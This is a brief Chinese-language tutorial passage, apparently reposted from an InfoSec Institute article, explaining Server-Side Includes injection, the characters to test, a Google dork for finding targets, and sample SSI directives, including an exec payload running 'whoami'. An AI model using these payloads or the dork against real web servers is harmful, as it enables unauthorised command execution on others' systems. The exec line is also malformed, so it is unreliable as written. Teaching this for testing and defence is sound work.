[/url]
http://resources.infosecinstitute.com/server-side-includes-ssi-injection/
服务器端包含注入SSI出现在动态填写HTML页面的场合。他们类似于CGIs,但是SSI用于在页面加载之前执行一些动作。为了这样,web服务器在提供页面给user之前分析SSI。
SSI攻击允许通过在HTML页面注入脚本或远程执行任意代码。可以通过操控SSI的使用或在user输入域中使用。
通过
引用
< ! # = / . " - > and [a-zA-Z0-9]
检查漏洞
另一种方法是识别页面是否包含 .stm, .shtm 和 .shtml后缀。
google dork:inurl:bin/cklb
可能导致操作文件系统和操控web服务器权限的进程。
例子:
引用
<!--#echo var="DOCUMENT_NAME" -->
显示当前文件名
引用
<!--#echo var="DOCUMENT_URI" -->
显示虚拟进程和文件名
引用
<!--#config timefmt="A %B %d %Y %r"-->
使用config和timefmt命令来控制时间和日期的格式
引用
<!--#fsize file="ssi.shtml" -->
显示选择的文件的大小
引用
<!–#exec cmd==”whoami” –>.
显示当前user